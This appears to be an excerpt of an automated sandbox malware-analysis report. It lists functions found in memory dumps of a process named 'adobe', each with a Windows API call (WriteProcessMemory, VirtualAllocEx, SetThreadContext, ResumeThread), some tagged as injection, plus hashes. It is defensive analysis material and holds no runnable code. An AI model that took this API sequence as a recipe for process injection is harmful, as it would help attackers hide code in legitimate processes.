Instruction ID: 7aab67ec6591f843023d58ace027d88fd01214ba4e06ace57a354d6a63e4d17e
Opcode Fuzzy Hash: 9a575db47a93ac8ca7e1dc703a7be34f63b1539e82a46804892a4ed11ddf7d15
Instruction Fuzzy Hash: A541E2B1C00619CADB24CFA9C884BCDBBF6BF49704F24805AD408AB255DB756985CF90

Function 05CA12A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05CA4371

Memory Dump Source

Source File: 00000006.00000002.1911265263.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5ca0000_adobe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e3829e30a1798acc160bf5be2dd72c197ec099bf7e991701d8763d11e1d60443
Instruction ID: 5d0d86e9c7ca2ea73c6b43e559d840e233c6c6326b9c2155378d6b821cf13ef3
Opcode Fuzzy Hash: e3829e30a1798acc160bf5be2dd72c197ec099bf7e991701d8763d11e1d60443
Instruction Fuzzy Hash: 664109B5900205CFDB14CF99C488AAEBBF6FF88314F25D859D519AB321D774A941CFA0

Function 050A44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 050A59C9

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d7fad2f15f4af70c43c3227d302281cc3cb27076dc606adb16d43af9aaffeecf
Instruction ID: d55fc7ffa1867b66aa7f795a612c16c6880ed751b09da544add1bead7ed8460a
Opcode Fuzzy Hash: d7fad2f15f4af70c43c3227d302281cc3cb27076dc606adb16d43af9aaffeecf
Instruction Fuzzy Hash: 8041FFB1D00719CBDB24CFA9C884BCEBBF5BF49304F24806AD408AB255DBB56985CF90

Function 07466269 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466300

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a3d0fae01c88a4f3a909d96f9f701ad591d428833e6a917ec62b2ced0b2e9638
Instruction ID: 46abc60b29ec42763188b3d236f0f5fb98448e2a3eee4d41987a52179afbb176
Opcode Fuzzy Hash: a3d0fae01c88a4f3a909d96f9f701ad591d428833e6a917ec62b2ced0b2e9638
Instruction Fuzzy Hash: A82168B59003499FCB10CFA9C885BDEBBF5FF48310F10882AE958A7240C7749584CBA1

Function 05F55038 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F550D7

Memory Dump Source

Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: b8ff940f717e415c226e83dec0d5ca7daf9363893dc1c71bb500a72282b50106
Instruction ID: 4e49c64b0cd989276eec44aab49788825e1c93b68f59e9a67eecbcc22a6f619d
Opcode Fuzzy Hash: b8ff940f717e415c226e83dec0d5ca7daf9363893dc1c71bb500a72282b50106
Instruction Fuzzy Hash: 8031C2B5D002099FDB10CF9AD884ADEFBF5FF48320F14842AE919A7210D775A945CFA0

Function 07466270 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07466300

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9f988b71f942b72d897aface06660a861073fca9a156a999a17698cf946d7197
Instruction ID: a0994736706cecacb178a492157738a8d9e2e29c7ebd1cd6a336811a68e887e3
Opcode Fuzzy Hash: 9f988b71f942b72d897aface06660a861073fca9a156a999a17698cf946d7197
Instruction Fuzzy Hash: 352157B1900359DFCB10CFA9C885BDEBBF5FF48310F10882AE958A7250C7789944CBA1

Function 05F55040 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F550D7

Memory Dump Source

Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 00b1e5d7a1d55073ea0a53aca171a54f61d04ce02350188b8b0009c9a1a89b4f
Instruction ID: fde345981fed7f89a5d9a4d7555475da2bd6fb812a8129bfa48a18443b22a335
Opcode Fuzzy Hash: 00b1e5d7a1d55073ea0a53aca171a54f61d04ce02350188b8b0009c9a1a89b4f
Instruction Fuzzy Hash: 4421B2B5D002499FDB10CF9AD884ADEFBF5FB48324F24842AE919A7310D775A944CFA4

Function 07466358 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074663E0

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8f96aba374ee2d37db65977e3472c703cf58514456b439094cfdb8bd8847b4d7
Instruction ID: db2d1c2bc06e18c98be488616e40985d4bb53a230ae0115fc342735f19e525f2
Opcode Fuzzy Hash: 8f96aba374ee2d37db65977e3472c703cf58514456b439094cfdb8bd8847b4d7
Instruction Fuzzy Hash: A92136B1D003599FDB10DFAAC884AEEFBF5FF48320F50882AE559A7250CB349544CBA1

Function 074660D3 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466156

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7248d5eb05858869c59336bd58490400ed0e532d5311238ff6a2f0a5d827c29d
Instruction ID: 14e0c626554ce7e182cd7af519f94f26a33910400eee6bc16efbfca6251f7a5b
Opcode Fuzzy Hash: 7248d5eb05858869c59336bd58490400ed0e532d5311238ff6a2f0a5d827c29d
Instruction Fuzzy Hash: 512139B1D002099FDB10DFAAC8857EEBBF4EF48364F10842AD459A7241CB789985CFA5

Function 050ACFB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050AD62E,?,?,?,?,?), ref: 050AD6EF

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9d9ee491d21b90d531a4dfb1f59313138accaa9a8d90e3b3d105b96ad11f9e1e
Instruction ID: 814bef9fa3d85ad3188e8a8350b2048490c7f735d21c411155ec1e2312577542
Opcode Fuzzy Hash: 9d9ee491d21b90d531a4dfb1f59313138accaa9a8d90e3b3d105b96ad11f9e1e
Instruction Fuzzy Hash: 1321E5B6900248EFDB10CF99D584ADEBBF5FB48310F14841AE918A7350D378A954CFA4

Function 050AD661 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050AD62E,?,?,?,?,?), ref: 050AD6EF

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b86681a524609974c619aa7624c3597d4e8060f972442646642e9ab3cca9b6ca
Instruction ID: aabbae90731f13236c0abe4f241d108ebfad6191c82e2b706e60933183ec4c3c
Opcode Fuzzy Hash: b86681a524609974c619aa7624c3597d4e8060f972442646642e9ab3cca9b6ca
Instruction Fuzzy Hash: 6221E3B6900258AFDB10CFAAD984ADEBBF5FB48310F14841AE918A7350D374A954CFA5

Function 07466360 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074663E0

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b2ca0e4e375c9b71547e94ba1f3b073a6ee8bb3b2cd5414efd13f3ff50d93b4f
Instruction ID: 896dd1a96ac169ebcda375bac471998b266c83e405454bd539fe6f5dd3b2c4d4
Opcode Fuzzy Hash: b2ca0e4e375c9b71547e94ba1f3b073a6ee8bb3b2cd5414efd13f3ff50d93b4f
Instruction Fuzzy Hash: 7D2128B1C003599FCB10DFAAC984ADEFBF5FF48320F10882AE559A7250C7749544CBA5

Function 074660D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07466156

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b33644af822952645810a7434dc2c229dc9496122e3f872978b384d1945e7693
Instruction ID: 2e939a71a6d40b7ea7904b0fd46a52c85908f13b0c422746e11f8d2b408c3426
Opcode Fuzzy Hash: b33644af822952645810a7434dc2c229dc9496122e3f872978b384d1945e7693
Instruction Fuzzy Hash: FD2138B1D003099FDB10DFAAC4857EEBBF4EF48324F10842AD459A7241C7789945CFA5

Function 074661AA Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0746621E

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d2f0d3cfc2e7c753027b8d2369e51e584b4a11b0f39bdee9a9e36b6481073812
Instruction ID: e1ee65757e6c19a5a0ec0bcfcaaedc1367d7ca07037aa1ede5239ecac5984dca
Opcode Fuzzy Hash: d2f0d3cfc2e7c753027b8d2369e51e584b4a11b0f39bdee9a9e36b6481073812
Instruction Fuzzy Hash: 981147B19002499FCB10DFA9D844AEFBFF5EB48324F20881AE555A7260CB759540CFA2

Function 050AABB8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050AB481,00000800,00000000,00000000), ref: 050AB672

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2183e3d26e72bd1a590dc7bae29e11a934645204a72cb023f9b179b0620e07b3
Instruction ID: d15065adbadb3298f3370c8eb77d2bf11ae2750bfb846800e5f41c91a28922f6
Opcode Fuzzy Hash: 2183e3d26e72bd1a590dc7bae29e11a934645204a72cb023f9b179b0620e07b3
Instruction Fuzzy Hash: 561126B6D04308DFCB10CF9AD448ADEFBF5EB88310F14842AE559A7210C379A545CFA4

Function 07465BE8 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07465C52

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6e6e60cafd7e8f6c6da8839ec323aa3b99f97ae140ef3662e3f1139d9131dde0
Instruction ID: 0de1ff31a0a148234b32f606cac84d73e941b8a64c11a44057a22078b0f005cb
Opcode Fuzzy Hash: 6e6e60cafd7e8f6c6da8839ec323aa3b99f97ae140ef3662e3f1139d9131dde0
Instruction Fuzzy Hash: F1118EB1D003488BCB20DFAAC4457DFFFF5EB88320F208829D455A7250C7355544CBA1

Function 074661B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0746621E

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a3095bcb4f86ce7bde25fa1ad9bf35b31af8b2b51816aa3fae11e7e11444a9a9
Instruction ID: 011c33718df969c9e39247fb7f251654747cf1fd904aee653a89f4aeedfd0be7
Opcode Fuzzy Hash: a3095bcb4f86ce7bde25fa1ad9bf35b31af8b2b51816aa3fae11e7e11444a9a9
Instruction Fuzzy Hash: DC1126B19002499FCB10DFAAC844BDFBFF5EB48324F20881AE555A7250C775A544CFA1

Function 050AB602 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050AB481,00000800,00000000,00000000), ref: 050AB672

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 227b7632ab69230a5867d884f148e310acba3e5c8aa8ec5b5f4468a250b5bf0f
Instruction ID: 0f5e30da4d188307b20364a84e5c62825906b053f579141042c1c5545ccc985c
Opcode Fuzzy Hash: 227b7632ab69230a5867d884f148e310acba3e5c8aa8ec5b5f4468a250b5bf0f
Instruction Fuzzy Hash: F01123B6D00208DFCB10CF9AD844ADEFBF4FB88310F14842AE559A7210C379A545CFA5

Function 05F5A918 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05F5A978

Memory Dump Source

Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2deb9f6b1fae434a700429c4d3b711a30ac9ff91f29a19f4e64f718fcfb7e6cf
Instruction ID: 072501b1a5177a9e07ef207e7949be2424722c4a89ad030bf3ed2d6bdbf6a6d0
Opcode Fuzzy Hash: 2deb9f6b1fae434a700429c4d3b711a30ac9ff91f29a19f4e64f718fcfb7e6cf
Instruction Fuzzy Hash: 461155B5800219CFCB10CF99C484BDEFBF5EB48320F11841AD958A7340D338A984CFA5

Function 050AAB54 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,050AB1CC), ref: 050AB406

Memory Dump Source

Source File: 00000006.00000002.1909783253.00000000050A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_50a0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 13e3d168afcd038d7134bbde9626f889e22ece41da5f6420313918c911965c4a
Instruction ID: 403d5fc5fcd88349f8cbef0f6c77ecddd2e88fba3d619889eac19e40319a5f09
Opcode Fuzzy Hash: 13e3d168afcd038d7134bbde9626f889e22ece41da5f6420313918c911965c4a
Instruction Fuzzy Hash: 321102B6C043498FCB20DF9AD844BDEFBF5EB48214F10842AD959B7210D379A545CFA5

Function 07465BF0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07465C52

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: de44732cf59f2e9a381121043b86e32d48e570bc03f01bbfad7cd76a58dff7d8
Instruction ID: cc838be5da444a23780ccf41c2970364e19bda69659ed6d01500cc057883079d
Opcode Fuzzy Hash: de44732cf59f2e9a381121043b86e32d48e570bc03f01bbfad7cd76a58dff7d8
Instruction Fuzzy Hash: 4F1128B1D003498BCB10DFAAC4497DEFBF5EB88324F24882AD559A7250C775A944CBA5

Function 07468950 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 074689B5

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ebd46e0f4aec0eba5f06e7f76232e19ae62bd29aced250fce733e6c5e6b5a6f4
Instruction ID: 3b1b74639c6ccda34e04da1c82c3973f481671cc34477520f8ee90b4ce8c57c5
Opcode Fuzzy Hash: ebd46e0f4aec0eba5f06e7f76232e19ae62bd29aced250fce733e6c5e6b5a6f4
Instruction Fuzzy Hash: 421116B58003499FCB10DF99D844BDEFFF8EB49324F10855AD554A3650C375A544CFA2

Function 07464AFC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 074689B5

Memory Dump Source

Source File: 00000006.00000002.1912457821.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7460000_adobe.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5dc890e34de10638588b15075d7031de84120602e75ebb620ff0436806c4b7cf
Instruction ID: 608672c958f67c6d14897231fc2206ab95237f72711a845fb81bba94a4f3b679
Opcode Fuzzy Hash: 5dc890e34de10638588b15075d7031de84120602e75ebb620ff0436806c4b7cf
Instruction Fuzzy Hash: F811F5B5800349DFCB10DF9AC548BDFBBF8EB59314F10885AE555A7200D375A944CFA2

Function 05F5A920 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05F5A978

Memory Dump Source

Source File: 00000006.00000002.1911610047.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5f50000_adobe.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 49d7022fa7f3e0b15b11300305007ec7b1d8eea392019bf8f05bfde869cc0cf5
Instruction ID: 88e06cc853e9939fc6880cf01a4bc975ca9accd6faba096f96f1556617848b04
Opcode Fuzzy Hash: 49d7022fa7f3e0b15b11300305007ec7b1d8eea392019bf8f05bfde869cc0cf5
Instruction Fuzzy Hash: BF1133B5800259CFCB10DF9AC544BDEFBF4EB48320F21842AD958A7250C338A584CFA5

Function 05FA46C8 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05FAAAF1

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: b06cf1fcf104daf9dfee8023a769a1bccaa42c03699279da0b4fc2ae3553afb4
Instruction ID: f568cfe23e57b99b2d6043a13a6ee837ef95aee0cdc00b513b71739bb8be35ba
Opcode Fuzzy Hash: b06cf1fcf104daf9dfee8023a769a1bccaa42c03699279da0b4fc2ae3553afb4
Instruction Fuzzy Hash: 7241AD76B002458FCB15DBB9984897EBBF6FFC42207148529E469CB3A4EF349C058B91

Function 05FAA279 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

8oq, xrefs: 05FAA2DF

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: 8oq
API String ID: 0-3198120224
Opcode ID: abc842a7fb0f2aca329a82eb8fe3ed90ec94e40e2256b1dc3706ae205d621272
Instruction ID: 5343ad579b452f6711dac3ed5e683efcd6a34beab36c140571e729c5597c008d
Opcode Fuzzy Hash: abc842a7fb0f2aca329a82eb8fe3ed90ec94e40e2256b1dc3706ae205d621272
Instruction Fuzzy Hash: FC1136363283088FC309EA68E55055F77A7FBC9219B14806EE44AC7744DE3A8C06CB51

Function 05FAA4A8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05FAA513

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 9131aa48bc8dd29e4f9e8a2f7f5845035566118138c1754ae165408634995f09
Instruction ID: c47b5975c2eda3c203ebbca66963fbba3337ad829d8b7a6fe774d87954b01a86
Opcode Fuzzy Hash: 9131aa48bc8dd29e4f9e8a2f7f5845035566118138c1754ae165408634995f09
Instruction Fuzzy Hash: AE1148B2F0020A8BCB15EBB999005EEB6F6AB88310B204069C505E7254EB399E05CBE5

Function 05FA0860 Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05FA089B

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 1ee92204974b6c974c32f93471b61c75f5612d998edfbdc5293af4499e69fd70
Instruction ID: 24a97966acce00f4e6b520840b205b9b98a7a9829d2f92803ce64fb481792349
Opcode Fuzzy Hash: 1ee92204974b6c974c32f93471b61c75f5612d998edfbdc5293af4499e69fd70
Instruction Fuzzy Hash: 0A016D793105008FCB04EB69D898A2AB7E7FFC8610720842DE60AC7365CE35EC05CB50

Function 05FA085A Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05FA089B

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: e85b88fe14fe404a0c5fe9f39d0383d94d0040109d0939c7e8adc2840ed25147
Instruction ID: 87c86688abe03affc2ab515929d90ded6851b44fb4e424311c5b8548325b96b3
Opcode Fuzzy Hash: e85b88fe14fe404a0c5fe9f39d0383d94d0040109d0939c7e8adc2840ed25147
Instruction Fuzzy Hash: 3901817A3105008FCB44EB79D498A2AB7E7FFC8610724842DE20ACB369CE35EC09CB50

Function 05FA2A85 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b4a7722f2edb6c8bdd3acad239d704f8bc0adbdecc0e82897a35caf2776d78
Instruction ID: aafb950f334684a8d169db809026cc9a57bc40203afe68553dafc43174628c0c
Opcode Fuzzy Hash: 98b4a7722f2edb6c8bdd3acad239d704f8bc0adbdecc0e82897a35caf2776d78
Instruction Fuzzy Hash: 7EA160743206098FC345AB78D5986AEBBA6FBCD344F00852DE51A8B358DF389946CB91

Function 05FA2AA0 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5127313fd69e8ff5fb97cd87bd9edd5d67e86572c438b61499e774247831b6
Instruction ID: ee0658ea02a3e8563b466b4b78bc9d93521d43fbf2aae5ec4e6daacaa829a9e5
Opcode Fuzzy Hash: 2a5127313fd69e8ff5fb97cd87bd9edd5d67e86572c438b61499e774247831b6
Instruction Fuzzy Hash: 709170743206098FC345AF78D5986AEBBA6FBCD344F00852DE51A87358DF38AD46CB81

Function 05FA1DC0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fbf12cce94de8cb6d7ec952b4c9ed716d27fa4c6ba6141b07f2e13c95280465
Instruction ID: f27885b40bdc184dc1135bbd839ff8ddf9761bec9073a8b54d73dc2dcbdc61ee
Opcode Fuzzy Hash: 6fbf12cce94de8cb6d7ec952b4c9ed716d27fa4c6ba6141b07f2e13c95280465
Instruction Fuzzy Hash: 15516C76E10249CFCF14DFA8D988ADDBBB6FF88304F148569E405AB361DB74A844CB61

Function 05FA1DD0 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff882a58013908036902fe0bf89c636a2e3ca2aa51776570284cbbb1963d734e
Instruction ID: 21d80e5318fd5cec4fc34a6c12d529e9d76e29bf4a2ae85102fe5ef839e0e60c
Opcode Fuzzy Hash: ff882a58013908036902fe0bf89c636a2e3ca2aa51776570284cbbb1963d734e
Instruction Fuzzy Hash: 32516B76E00249CFCF14DFA8D988ADDBBB6FF88304F148569E405AB364DB34A844CB61

Function 05FA8758 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3d16992072d08e831f2b9dc4ed9e57370ecd61d2d81ada7db2ab66f75e2fc26
Instruction ID: 19974ebe19904fb48e0d2023106a52b34eba3885a2c474caa32759c8cb079239
